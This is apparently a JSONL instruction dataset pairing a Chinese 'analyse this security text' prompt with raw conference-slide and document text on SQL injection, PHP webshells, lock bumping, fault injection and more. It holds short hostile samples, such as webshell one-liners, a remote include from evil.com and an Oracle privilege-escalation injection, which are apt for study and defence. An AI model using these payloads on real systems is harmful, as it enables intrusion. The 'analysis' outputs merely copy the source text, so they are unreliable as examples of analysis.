security context allows it HANDLE OpenProcess( DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId // <- The Process ID ); Process  Process contains:  Mapped PE images (the main EXE + dependencies: DLLs with needed imports)  The workingset (all the memory that is used during its execution)  Threads: at least one (structures for execution of the code)  Open Handles (managing access to needed objects: i.e. Files, Mutexes, Events)  Access Tokens (representing security information, and specifying privileges of the process and threads) Process  Contains PE files in a virtual format MyApp.exe MyApp.exe NTDLL.DLL Kernel32.DLL Process Executable file PE on the disk: Raw format PE in memory: Virtual format <allocated memory> <allocated memory> Pro", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAttack the Key Own the Lock by datagram & Schuyler Towne Defcon 18 (2010) Las Vegas, NV About Us  Datagram  Forensic locksmith  Douchebag  No game shows :(  Schuyler  TOOOL US  NDE Magazine  Wheel of Fortune How Locks Work How Locks Work How Locks Work How Locks Work Key Control  Availability of blanks  Distribution  Duplication/simulation Attacking the Key  Bitting depths/code  Keyway  Model of the lock  Additional security features Physical Access to Keys  Holy Grail  Duration = Attack Quality  Wrist Impressioning Direct Measurement  Key gauges  Micrometer  Calipers Copy Impressioning Copy Impressioning Visual Access to Key  Sight reading  Estimation  Photography Visual Access  UCSD Visual Access - Diebold Visual Access  NY MTA Key Blanks  Impressioning  Overlifting  Reflecting keys  Sectional keyways  Rake keys  Key bumping Universal Handcuff Keys Overlifting Overlifting Rake/Gypsy Keys Impressioning Impressioning Works Forever! Reflecting Keys Sectional Keyways Sectional Keyways Incorrect Key  Master key decoding  Bumping  Skeleton keys  Sidebar attacks  Passive component bypasses  Decoding attacks Master Key Systems Master Key Systems Master Key Systems Master Key Systems Master Key Systems Key Bumping  Basic physics  Specialized key  Easy, effective  Vendor response Pick Gun Mechanics How Bumping Works Creating Bump Keys  Any key that fits  Cut 999 key (deepest pin depths)  Use key gauges  Cut with  Hand file, dremel, key cutter Bump Keys Key Bumping Key Bumping 100% Efficiency...? Don't underestimate attackers... Bumping Hammers Side Pins Side Pins Side Pins Side Pins Side Pins Regional Sidebar Attacks  ASSA Twin Combi  Schlage Primus  Fichet 480  The list goes on...  Schlage is doing it wrong. One Last Way Schlage Is Doing It Wrong: LFIC  BEST SFIC  Small Format Interchangable Core  Schlage LFIC  6.5 Control Key Passive Components What have we learned? Resources  openlocksport.com  lockwiki.com  lockpickingforensics.com  ndemag.com Meet us at Q&A!", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Making Of Second SQL Injection Worm (Oracle Edition) Sumit Siddharth SID@notsosecure.com www.notsosecure.com Defcon 17 Las Vegas 2009 2 Defcon 17, Las Vegas, July 2009 About Me: Senior IT Security Consultant More than 4 years of Penetration Testing Not an Oracle Geek :( My Blog: www.notsosecure.com 10 slides + 2 Demos= 20 Mins !! 3 Defcon 17, Las Vegas, July 2009 Agenda How to exploit SQL Injections in web applications with oracle back-end to achieve the following: Escalate privileges from the session user to that of SYS (Similar to openrowset hacks in MS SQL) Execute OS Commands and achieve file system read/write access (Like xp_cmdshell in MS SQL) Can worms target Oracle web apps? (Just as they did against MS SQL) 4 Defcon 17, Las Vegas, July 2009 Oracle: How Things Work By default Oracle comes with a lot of stored procedures and functions. Mostly these functions and stored procedures run with definer privileges (default). In order to make the function execute with the privileges of the user executing it, the function must have 'authid current_user' keyword. If you find a SQL (PL/SQL) injection in a function owned by SYS and with 'authid definer', you can run SQL (PL/SQL) as SYS. 5 Defcon 17, Las Vegas, July 2009 SQL Injection in Oracle:  PL/SQL Injection  Injection in Anonymous PL/SQL block  No Restriction  Execute DDL, DML  Easy  SQL Injection  Injection in Single SQL Statement  Restrictions  No ';' allowed  Need more vulnerabilities  Difficult 6 Defcon 17, Las Vegas, July 2009 PL/SQL Injection  Injection in Anonymous PL/SQL block create or replace procedure orasso.test (q IN varchar2) AS BEGIN execute immediate ('begin '||q||'; end;'); END; * Attack has no limitation * Can Execute DML and DDL statements * Easy to exploit * Can Execute Multiple statements: * q=>null;execute immediate 'grant dba to public';end'-- 7 Defcon 17, Las Vegas, July 2009 PL/SQL Injection from Web Apps  Vulnerable Oracle Application server allows PL/SQL injection Bypass the PL/SQL exc", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWEAPONIZING HYPERVISORS TO FIGHT & BEAT CAR & MEDICAL DEVICE ATTACKS Ali Islam  CEO Numen Inc Dan Regalado  DanuX  CTO Numen Inc AGENDA Basic&Concepts& Q&A& Embedded&Environment& Demo&&Attacks&&&Use&cases& Hypervisors & Strong Trending Confidential Agent-less vs Agent (AV)  Sophisticated Invisibility (VMI) - Cat and mouse game  No messing up the actual device functionality  Helps with regulations and certifications Lets start the Journey Setting up the Environment on a Zynq UltraScale+ MPSoC ZCU 102 Src: https://www.digikey.com/product-detail/en/xilinx-inc/EK-U1-ZCU102-G/122-2035-ND/7035245#images-1 SD Card UART JTAG Zynq UltraScale+ MPSoC ZCU 102 ETHERNET - DDR4  4 GB - Quad-core Cortex A-53 - Dual-core Cortex R5F Booting the board with JTAG  Using Xilinx System Debugger CLI (xsdb) which reads a tcl file PMUFW  Setup clock and platform management FSBL  First Stage Bootloader  Initializes U-Boot U-Boot  Boots the Hypervisor, Kernel and rootfs Bl31  ARM Trusted Firmware U-Boot Configuration  Preparing Device Tree Blob (DTB) xen.dtb file (dts below): ZynqMP> tftpb 0x1380000 xen.dtb ZynqMP> tftpb 0x80000 Image-2018.3 ZynqMP> tftpb 0x1400000 xen.ub ZynqMP> bootm 0x1400000 - 0x1380000 # mkimage -A arm64 -T kernel -a 0x1400000 -e 0x1400000 -C none -d xen-zcu102-zynqmp xen.ub  Preparing the hypervisor: Building the rootfs  PetaLinux: Xilinx-based and therefore not universal  Yocto: Universal but builds a Busybox limited rootfs ü Real pain to compile new libraries  Debootstrap: Way to go, Debian-based FileSystem J Dev environment  You do not want to make changes directly on the board  Schroot to the rescue ü Chroot into the rootfs but from a mounting point via QEMU Lets get the damn ARM Syscalls out! VMI & Semantic Gap Understand meaning using OS specific knowledge https://notes.shichao.io/lkd/ch3/ linux_name = 0x4f0; linux_tasks = 0x280; linux_mm = 0x2d0; linux_pid = 0x334; linux_pgd = 0x40; Kernel Symbol Value Example http://libvmi.com/docs/gcode-intro.html status_t vmi_r", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n安服崽日常做代码审计的时候经常需要把已经发布的 java 项目反编译 之前一直都是把所有 jar 和 class 打进一个 zip 包扔到 jd-gui然后在 save all resource这 种办法很蠢 直到 bearcat 师傅发给我一个消息我才发现原来批量反编译 java 代码是这么简单的一件 事只需要一个命令就可以了 Idea 自带的反编译项目地址https://github.com/fesh0r/fernflower 对我们安服崽来说还是不太方便稍微做了一些改动增加了筛选 class 的功能黑白名单 方式让脚本只反编译我们需要的 class仅仅只是 indexof 来做筛选 只需要在 fernflower 的 jar 包同级目录下扔一个{jar 包名}.black.txt 和{jar 包名}.white.txt 就 可以了 例如 jar 包命名为 shadiao.jar同级目录下就扔 shadiao.jar.black.txt 和 shadiao.jar.white.txt 如果只想反编译com/alibaba/xxx开头的class就在{jar包名}.white.txt里写一行com/alibaba/ 如果不想反编译 org/jetbrains/xxx 开头的 class 就在{jar 包名}.black.txt 里写一行 org/jetbrains/ 修改后的代码地址https://github.com/jiashaoxiong1998/fernflower 改动 1gradlew 项目改成 maven 项目使用 shade 插件打 jar 包 改动 2src/main/java/org/jetbrains/java/decompiler/struct/consts/ConstantPool.java 源码用 到了 jdk11 中 String.java 的 repeat 方法做了一下改动 其他改动全局搜//modify 就可以了", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPHPCHIP.COM PHP动态特性的捕捉与逃逸 Phith0n 2019 About Me phith0n  https://www.leavesongs.com  http://weibo.com/101yx  https://github.com/phith0n 长亭科技  https://github.com/chaitin/xray 精通  PHP  Python  Golang  Javascript 等语言Hello World程序的拼写 目录 CONTENTS PART 01 PHP与动态特性 01 PART 02 如何检测PHP动态特性 02 PART 03 从攻击者的角度突破限制 03  PHP与动态特性  常见PHP Webshell的类型  我们来做一个代码哲学家 PART 01 PHP与动态特性 PHP与Web应用 PHP是世界上最好的语言 PHP是Web应用最广泛的语言  灵活  发展迅速  逐渐废弃不安全的特性 其灵活的特性往往成为Webshell漏洞的导火索 常见PHP Webshell的类型  直接型  eval($_POST[2333]);  assert($_POST[2333]);  回调型  array_map('assert', $_POST);  usort($_POST[1], $_POST[2]);  包含型  include $_FILES['2333']['tmp_name'];  require 'http://evil.com/1.txt';  变形型  eval(gzdeflate(base64_decode('...')));  $_=[];$_++;$_++;...;$_($__);  命令型  `$_POST[2333]`;  system($_POST[2333]);  技巧型  create_function('', $_POST[2333]);  preg_replace('/.*/e', $_POST['n'], $_POST[2333]); 让我们从另一个角度理解PHP 一段固定的代码其功能究竟能否确定 preg_replace('/a/i', 'b', $_POST['name']); eval(\"\\$ret = $arr;\"); $arr = [$_GET, $_POST, $_COOKIE]; array_map($callback, ...$arr); include './inc/' . $filename; foreach (dir('./') as $f) { echo $f->read(); } echo \"hello world\"; 我们来做一个 代码哲学家 preg_replace('/a/i', 'b', $_POST['name']); eval(\"\\$ret = $arr;\"); $arr = [$_GET, $_POST, $_COOKIE]; array_map($callback, ...$arr); include './inc/' . $filename; foreach (dir('./') as $f) { echo $f->read(); } echo \"hello world\"; 我们来做一个 代码哲学家 这是一段不确定功能的代码 $arr = [$_GET, $_POST, $_COOKIE]; array_map($callback, ...$arr); 思考开发者的本意是什么 array_map('htmlspecialchars', ...$arr); 随着$callback的改变这段代码的功能可能变成什么 array_map('assert', ...$arr); 我们来做一个 代码哲学家 一段代码其中变量值的改变可能导致这 段代码发生功能上的变化我将这种现 象成为 PHP的动态特性  CHIP是什么  CHIP是如何工作的  回调后门如何检测 PART 02 如何检测PHP动态特性 CHIP  PHP动态特性检测实现 主页: https://phpchip.com 优势 1. 全面覆盖99.9%动态特性 2. 简单支持命令行与代码调用可使用composer安装 3. 可扩展支持自定义规则 CHIP工作流程 Parser Walker Analyze Ast Tree Visitor CHIP是如何工作的 è Parser PHP-Parser: https://github.com/nikic/PHP-Parser 支持PHP5.2~ 7.4所有语法结构 PHP-Parser能解决的最大问题 Parser的结果是许多AST Tree 遍历这些树上的所有Node 思考是否还有其他值得注意的语法结构", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSecuring Linux Systems with AppArmor Crispin Cowan, PhD Director of Software Engineering Security Architect, SUSE Linux AppArmor: Easy-to-use Security for Ubuntu Linux Crispin Cowan, PhD Security Architect, SUSE What Is This 'AppArmor' Thing and Why Should I Care?  Novell Inc. All rights reserved 3 Agenda Overview A Closer Look at AppArmor Deployment Scenarios Demonstration of AppArmor Competitive Positioning AppArmor Futures  Novell Inc. All rights reserved 4 Software Security Problem Problem: Imperfect software :-)  Reliable software does what it is supposed to do  Secure software does what it is supposed to do, and nothing else Solution: only use perfect software ... slight supply problem :-)  Novell Inc. All rights reserved 5 AppArmor Solution Enforce that applications only get to do what they are supposed to do What means do?  At ultimate detail, this is the code itself  But we clearly can't get that right :-)  Need something simpler, more abstract Resources:  Restrict the application to only access the OS resources it should need  Novell Inc. All rights reserved 6 What Would You Do With That? Make a server network secure:  Confine all programs with open network ports  If all open ports lead to confined processes, then you have completely defined policy for what a network user or attacker can do  Yet far from having created policy for thw whole system  Novell Inc. All rights reserved 7 Is that really secure? Hard to say Security is semi-decidable  You can only tell when something is insecure  Hence all the Defcon talks on breaking something, and few on securing something So lets put it to a practical test  Put it in competition at Defcon and let people beat on it  Novell Inc. All rights reserved 8 Defcon CtF 2002-5 a la Ghettohackers Some real-world red teaming Play an Immunix server in the Defcon Capture the Flag (CtF) games Almost no holds barred:  No flooding  No physical attacks New gaming rig designed by the Ghettohackers  Novell Inc. All rights reserved 9", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\ncrawlergo是一个使用 chrome headless 模式进行URL收集的浏览器爬虫它对整个网页的关键 位置与DOM渲染阶段进行HOOK自动进行表单填充并提交配合智能的JS事件触发尽可能的 收集网站暴露出的入口内置URL去重模块过滤掉了大量伪静态URL对于大型网站仍保持较快 的解析与抓取速度最后得到高质量的请求结果集合 crawlergo 目前支持以下特性 * 原生浏览器环境协程池调度任务 * 表单智能填充自动化提交 * 完整DOM事件收集自动化触发 * 智能URL去重去掉大部分的重复请求 * 全面分析收集包括javascript文件内容页面注释robots.txt文件和常见路径Fuzz * 支持Host绑定自动添加Referer * 支持请求代理支持爬虫结果主动推送 Github: https://github.com/Qianlitp/crawlergo 作者开源了源码我是很兴奋的以前也有写一个的想法但是开源的动态爬虫不多看了其中几个 调研 1. https://github.com/fcavallarin/htcap 递归dom搜索引擎 发现ajax/fetch/jsonp/websocket请求 支持cookie代理uahttp auth 基于文本相似度的页面重复数据删除引擎 根据文本长度 <256 simhash else ShinglePrint 主要代码是python调用puppeteer但是核心逻辑在js里 2. https://github.com/go-rod/rod 一个操作chrome headless的go库 它比官方提供的chrome操作库更容易使用 有效解决了chrome残留僵尸进程的问题 3. https://github.com/lc/gau 通过一些通用接口获取url信息 4. https://github.com/jaeles-project/gospider Web静态爬虫也提供了一些方法获取更多URL 5. https://github.com/chaitin/rad 1. rad虽然没有开源但是它里面使用yaml进行的配置选项很多通过配置选项可以大致知道它 的一些特性 2. 可以手动登陆 3. 启用图片 4. 显示对爬取url的一些限制 1. 不允许的文件后缀 2. 不允许的url关键字 3. 不允许的域名 4. 不允许的url 5. 设置下个页面最大点击和事件触发 Crawlergo 之前也想过写一个动态爬虫来对接扫描器但是动态爬虫有很多细节都需要打磨一直没时间做现在 有现成的源码参考能省下不少事 主要看几个点 对浏览器 JavaScript环境的hoook dom的触发表单填充 url如何去重 url的收集 目录结构 根据源码的调用堆栈做了一个程序启动流程图 cmd  crawlergo # 程序主入口 examples imgs pkg config # 一些配置相关 engine # chrome相关程序 filter # 去重相关 js # 一些注入的js logger # 日志 model # url和请求相关的库 tools # 一些通用类库 requests 配置文件 pkg/config/config.go 定义了一些默认的配置文件 const ( DefaultUA = \"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\" MaxTabsCount = 10 TabRunTimeout = 20 * time.Second DefaultInputText = \"Crawlergo\" // 默认输入的文字 FormInputKeyword = \"Crawlergo\" // form输入的文字但是代码中没有引用这个变量 的 SuspectURLRegex = `(?:\"|')(((?:[a-zA-Z]{1,10}://|//)[\"'/]{1,}\\.[a- zA-Z]{2,}[\"']{0,})|((?:/|\\.\\./|\\./)[\"'><,;|*()(%%$/\\\\\\[\\]][\"'><,;|()]{1,})| ([a-zA-Z0-9_\\-/]{1,}/[a-zA-Z0-9_\\-/]{1,}\\.(?:[a-zA-Z]{1,4}|action)(?:[\\?|#][\"|'] {0,}|))|([a-zA-Z0-9_\\-/]{1,}/[a-zA-Z0-9_\\-/]{3,}(?:[\\?|#][\"|']{0,}|))|([a-zA-Z0- 9_\\-]{1,}\\.(?:php|asp|aspx|jsp|j", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n供应链安全分享 Greta Fan 供应链攻击案例 Solarwinds 特点 应对 伪装主机名 主动适配目标地区IP 横向移动 临时文件替换 1. 登录IP检查 2. 登录活动检查 3. 任务和文件监控 4. 高权限账户活动监控 高隐蔽性 范围极 广 针对性强 组织严密 持续性长 1. 资产和软件生命周期 安全管理 2. 安全开发管理 3. 针对供应链安全事故 的应急响应 供应链攻击案例 Solarwinds 供应链安全管理 管理框架 前瞻性为 导向 综合的风 险管理 效率和有 效性控制 领导和透 明性 业务部门 其他部门 合规风险管 理委员会 高层管理 董事会 内审/风控委 员会 供应链安全管理 供应商管理框架供应商分类分级管理 等级 定义 1 不涉及数据处理 2 涉及内部数据处理 3 涉及少量敏感信息处理 4  5   根据数据敏感程度/数据量  根据供应商的依赖程度 等级 定义 1 出事故不会影响业务 2 可以立刻恢复业务 3 可以在短时间内恢复业务 4  5   根据供应商规模大小  根据合作时间  根据合作金额大小   供应链安全管理 供应链管理 系统 供应商 供应商 自研 开源框 架 企业 自研 开源框 架 以 系 统 为 核 心 供应链安全管理 供应链风险矩阵 风险等级 可替代性 影响业务 整改难度 1 完全可替代 无影响 简单或无需整改 2 稍微修改即可替代 较小影响 较简单 3 需要较大努力可替代 有影响 需要一个月以内时间 4 需要很大努力才可能替代 很大影响 需要一个月以上时间 5 不可替代 很大影响 垄断不受控 重点监控事前发现 供应链安全管理 项目流程中的安全 威胁评估 安全需求 分析 架构检查 需求确定 需求分析 架构设计 实施 整合 验证 检查 漏洞管理 源代码  项目计划  项目评估和 控制  决策管理  风险管理  配置管理  信息和数据 管理 供应链安全管理 供应链安全管理的挑战 新技术新威胁 零售行业发展迅速业务部门施压 专业技术人员 招聘培训专业人员的成本巨大 投资回报率 ROI一个永恒的难题 供应链安全管理 Best Practice 标准化体系化以及集中化的供应商管理 整个企业内部进行长久和持续的沟通培训 1 2 关键供应商进行定期审计 3 各类监控工具防御工具确保业务连续性 4 可针对关键业务购买保险 5", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#BHUSA @BlackHatEvents Tunable Replica Circuit for Fault- Injection Detection Daniel Nemiroff Carlos Tokunaga  FaultInjection Attack Basics  Dive into the TRC (Tunable Replica Circuit)  Why and How Intel Integrated the TRC  TRC Calibration and Validation  Conclusions and Productization NonInvasive FI Attacks  This briefing covers the faultinjection detection circuit, known as the TRC (tunable replica circuit).  Our focus is noninvasive FI attacks, where modification of the package is out of scope, this includes:  Voltage attacks  Clock attacks  EM (electromagnetic radiation) attacks  Thermal attacks NonInvasive FI Attacks As they are exposed at the packagelevel, clock and voltage pins are the primary non invasive attack surface. SemiInvasive FI Attacks  Lasers are a primary semiinvasive threat, because they require a package delid.  However, research shows attacks from the side of a package can be done, without a delid.  These attacks are out of scope for this briefing. To Complete the Circle . . . . . . Invasive Physical Attacks Primary Vehicles:  FIBs, etching, ondie probing, etc.  Again, out of scope for this briefing, which is focused on noninvasive physical attacks. What is the Attacker is Trying to Accomplish with FI?  Using FI, a common goal of the attacker is to cause circuit timing to fail, without causing the platform to crash.  When circuit timing fails, data can be latched too early or too late.  In many cases, latching data early causes 0x00 to be latched.  In the context of a CPU or uC, when glitched at just the right time, an attack can cause a NOP to be latched, instead of a JMP.  In fixedfunction crypto engines, real keys could be replaced, etc.  In fabrics and busses, I/O devices could latch data or bus addresses too early/late. Voltage Glitch Impact on Timing Good CLK Data Lines: Undervoltage glitch slows the data down, resulting in a 0b being latched Undervoltage Glitch Attack NOP JMP Clock Glitch Impact on Timing Good Clock Data Lines Good CLK l", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nparted === 磁盘分区和分区大小调整工具 ## 补充说明 **parted命令** 是由GNU组织开发的一款功能强大的磁盘分区和分区大小调整工具与fdisk不同它支持调整分区的大小作为一种设计用于Linux的工具它没有构建成处理与fdisk关联的多种分区类型但是它可以处理最常见的分区格式包括ext2ext3fat16fat32NTFSReiserFSJFSXFSUFSHFS以及Linux交换分区 ### 语法 ```shell parted(选项)(参数) ``` ### 选项 ```shell -h显示帮助信息 -i交互式模式 -s脚本模式不提示用户 -v显示版本号 ``` ### 参数 * 设备指定要分区的硬盘所对应的设备文件 * 命令要执行的parted命令 ### 实例 从串行技术出现以来越来越多用户选择使用大容量的SATA硬盘创建磁盘阵列特别是MD1000/MD3000很轻易就突破2T的LUN故在此给大家一些指引 红帽企业 Linux 4 Update 4供对大于 2 terabytesTB的磁盘设备的支持 请参考以下操作步骤 注 * 绿色代表你需要使用的命令 * 红色代表你需要注意到的输出信息在后续需要使用 ```shell [root@localhost ~]# fdisk -l Disk /dev/sda: 35.8 GB, 35862976512 bytes 255 heads, 63 sectors/track, 4360 cylinders Units = cylinders of 16065 * 512 = 8225280 bytes Device Boot Start End Blocks id System /dev/sda1 * 1 13 104391 83 Linux /dev/sda2 14 144 1052257+ 82 Linux swap /dev/sda3 145 4360 33865020 83 Linux Disk /dev/sdb: 2147 MB, 2147483648 bytes 255 heads, 63 sectors/track, 261 cylinders Units = cylinders of 16065 * 512 = 8225280 bytes Disk /dev/sdb doesn't contain a valid partition table ``` ```shell [root@localhost ~]# parted /dev/sdb GNU Parted Copyright (C) 1998 - 2004 free Software Foundation, Inc. This program is free software, covered by the GNU General Public License. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. 使用/dev/sdb (parted)mklabel gpt (parted)print /dev/sdb的磁盘几何结构0.000-2048.000兆字节 磁盘标签类型gpt Minor 起始点 终止点 文件系统 名称 标志 (parted)mkpart primary 0 2048 <-----上面print显示的数字 (parted)print /dev/sdb的磁盘几何结构0.000-2048.000兆字节 磁盘标签类型gpt Minor 起始点 终止点 文件系统 名称 标志 1 0.017 2047.983 (parted)quit ``` 如果必要不要忘记更新`/etc/fstab` ```shell [root@localhost ~]# fdisk -l Disk /dev/sda: 35.8 GB, 35862976512 bytes 255 heads, 63 sectors/track, 4360 cylinders Units = cylinders of 16065 * 512 = 8225280 bytes Device Boot Start End Blocks Id System /dev/sda1 * 1 13 104391 83 Linux", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSAVING THE INTERNET Jay Healey @Jason_Healey Atlantic Council 1. Shift in people demographics  different nations, different values and relationship of millenials 2. Shift in device and computing demographics  massive uptick in devices (IoT and IoE), change in how people connect (mobile), change in how and where computing is done (cloud, quantum, wearable and embedded) 3. Massive growth in data  big data, analytics, universal telemetry from IOT 4. Growing tech and policy challenges  Moores Law? Network neutrality 5. Breakdown of governance  walled gardens, increase of national borders, decreasing trust, lack of large-scale crisis management mechanisms 6. Continuing attacker and offense advantage over defense  O>D The Large Internet Trends Cyberspace Domain of Warfare  or Not? A global domain within the information environment consisting of the interdependent network of information technology infrastructures and resident data, including the Internet, telecommunications networks, computer systems, and embedded processors and controllers Although cyberspace is a man-made domain, it has become just as critical to military operations as land, sea, air, and space. As such, the military must be able to defend and operate within it. - Bill Lynn, then-Deputy Secretary of Defense By increasingly equating cyber with national security the Washington policy community has militarized the underlying resource, the Internet ~1436 ~1454 If there is something you know, communicate it. If there is something you don't know, search for it. Violates Privacy? Civil Liberties? Legal? Constitutional? If there is something you know, communicate it. If there is something you don't know, search for it. Global Internet Users 1993: 14 million 2003: 778 million 2013: 2.7 billion 2030? 2280? Data breaches Cyber crime Anonymous Malware Espionage State-sponsored attacks Stuxnet Heartbleed Erection of borders    Privacy Civil Liberties Security sep Future Economic and National Security Todays National ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTC260-PG-20212A 网络安全标准实践指南 网络数据分类分级指引 v1.0-202112 全国信息安全标准化技术委员会秘书处 2021 年 12 月 本文档可从以下网址获得 www.tc260.org.cn/ I 前 言 网络安全标准实践指南以下简称实践指南 是全国信息安全标准化技术委员会以下简称信安标委 秘书处组织制定和发布的标准相关技术文件旨在围绕网络 安全法律法规政策标准网络安全热点和事件等主题宣 传网络安全相关标准及知识提供标准化实践指引 II 声 明 本实践指南版权属于信安标委秘书处未经秘书处 书面授权不得以任何方式抄袭翻译实践指南的任何 部分凡转载或引用本实践指南的观点数据请注明 来源全国信息安全标准化技术委员会秘书处 技术支持单位 本实践指南得到中国电子技术标准化研究院中国 移动通信集团有限公司中国网络安全审查技术与认证中心 北京信息安全测评中心成都卫士通信息产业股份有限公司 亚信科技成都有限公司北京百度网讯科技有限公司 北京奇虎科技有限公司联通大数据有限公司北京明朝万 达科技股份有限公司天翼电子商务有限公司蚂蚁科技集 团股份有限公司深信服科技股份有限公司北京爱奇艺科 技有限公司杭州安恒信息技术股份有限公司北京字节跳 动科技有限公司阿里巴巴北京软件服务有限公司OPPO 广东移动通信有限公司中国电信集团有限公司北京数安 行科技有限公司顺丰速运有限公司深圳市腾讯计算机系 统有限公司北京小桔科技有限公司京东科技控股股份有 限公司闪捷信息科技有限公司内蒙古自治区大数据中心 等单位的技术支持 III 摘 要 为贯彻落实中华人民共和国数据安全法中国家建 立数据分类分级保护制度要求保障国家安全公共利益 个人和组织的合法权益本实践指南依据法律法规和政策标 准要求给出了网络数据分类分级的原则框架和方法可 用于指导数据处理者开展数据分类分级工作也可为主管监 管部门进行数据分类分级管理提供参考 IV 目 录 1 范围....................................................................... 1 2 术语定义 ................................................................... 1 3 数据分类分级原则 ........................................................... 3 4 数据分类分级框架 ........................................................... 3 4.1 数据分类框架 ......................................................... 3 4.2 数据分级框架 ......................................................... 4 5 数据分类方法 ............................................................... 5 5.1 数据分类流程 ......................................................... 5 5.2 个人信息识别与分类 ................................................... 7 5.3 公共数据识别与分类 .................................................. 10 5.4 公共传播信息识别与分类 .............................................. 11 6 数据分级方法 .............................................................. 12 6.1 分级要素 ............................................................ 12 6.2 基本分级规则 ........................................................ 14 6.3 一般数据分级规则 .................................................... 14 6.4 定级方法 ............................................................ 15 6.5 重新定级 ....................", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPlug For Plug-Ins Burning oil-based fuels, in addition to its political and economic problems, is the single largest contributor to U.S. greenhouse gas emissions. The interim strategy of increasing fuel efficiency of gasoline powered cars relies on a continuing commitment to gasoline. In parallel, strategies are needed for reducing dependency on fossil fuel. a range of approaches will do this. Electric cars provide unique opportunities in this regard, as they can be powered by solar, wind or almost any other form of renewable energy. Why would converting the entire U.S. auto fleet add so little to electric consumption? The key is the greater efficiency of the electric motor. According to Chevron engineers, the current internal combustion car only delivers 13% of the fuel energy from the motor to the wheel. A recent report by US traffic engineers discovered that 10% of the remaining energy is wasted waiting for traffic lights. In contrast, 85% of the energy stored in an EVs batteries is delivered to the wheels, and no energy loss while stopped in traffic. Join the green car movement Many people have decided they wont wait for the automakers to come up with an affordable, true 100% electric car. These people have been converting gas-engine donor cars to all-electric themselves for 40 years. There are many companies in the U.S. that sell conversion kits custom designed for specific popular car and truck models, or generic kits that the hobbyist can custom fit easily into any vehicle. HEAA.org Houston Electric Auto Association Get informed Look past the government, auto and oil industry hype Web links for more information: http://www.pluginamerica.org http://www.setamericafree.org http://www.evfinder.com http://www.driveev.com http://www.eaaev.org Electric Cars: The Future is Here! Starve a terrorist, drive an electric car No noise, no smog, no gas, no kidding! A Case for Electricity Until the Nissan Leaf and Chevy Volt are introduced into the market, home conversion is", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRenderMan Michael theprez98 Schearer render@renderlab.net theprez98@verizon.net HACKERS VS. DISASTERS Our hacker brains are pre-wired to find alternate uses for many devices. We look at the world as a puzzle to solve in everything we do. We can come up with the most extraordinary solutions to problems under the most extraordinary circumstances. Hacker skills are largely compatible with the skills necessary to survive in the wilderness or during a natural disaster. HACKER SKILLS FOR WILDERNESS AND DISASTER SURVIVAL PART 1 Have you seen Survivorman? Michael theprez98 Schearer  Work for Booz Allen in central Maryland  Spent 8+ years in the U.S. Navy as an EA-6B Electronic Countermeasures Officer  Veteran of aerial combat missions over Iraq and Afghanistan  Spent 9 months on the ground in Iraq as a counter-IED specialist  Licensed amateur radio operator, active member of the Church of WiFi, a football coach and father of four Michael theprez98 Schearer  Previous speaker at DEFCON, ShmooCon, HOPE and other conferences  Contributor to several Syngress books Why you should listen to me (maybe)  Military experience  Graduate of the Department of Defenses Survival, Evasion, Resistance and Escape (SERE) school  Other survival and outdoor training  Skills learned from experiences (both good and bad!) Why you should be skeptical I am not this guy or this guy  I am not a survival expert; other people (maybe some of you) know more than I do  Survival skills will vary based upon experience, training, geography, weather, time of year and other factors Why you should care: Natural disasters  Tornadoes  ~1300 tornadoes per year since 2000  $427 million of damage per year since 1950  Hurricanes  ~10 named (Atlantic) storms per year since 1944  $1.6-6.2 billion of damage per year since 1950  Hurricanes Katrina and Rita caused an estimated $45 billion dollars in damage Why you should care: Natural disasters/Pandemics  Earthquakes  19.4 magnitude 7.0+ earthquakes per year  $4.4 billion i", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nImproving Cybersecurity through Non-Technical Exercises and In- House Strategic Analysis View from the Czech Republic by Michal Thim DRAFT - DO NOT QUOTE DISCLAIMER: The views and opinions expressed in this presentation are those of the presenter and do not necessarily reflect the official policy, position of the National Cyber and Information Security Agency of the Czech Republic, or any other government agency.  Cyber and policy/OSINT specialist at the Czech National Security Authority/National Cyber and Information Security Agency (NCISA) since August 2016, with research focus on East Asia (military and security developments, APTs)  Background in political science. Not even remotely close to be a technical expert.  Worked in a foreign policy think-tank (experience with decision-making environment)  Tried academic environment (and left it behind, which made both me and academia quite happy)  Developed some knowledge of Chinese language (can order coffee in Starbucks and has a 50% chance to answer correctly YES/NO question)  Above is not atypical personnel profile at the NCISA DRAFT - DO NOT QUOTE  Central body of state administration for cyber security  Mission(s)  Operation of the government CERT team: GovCERT.CZ  Cooperation with national & international 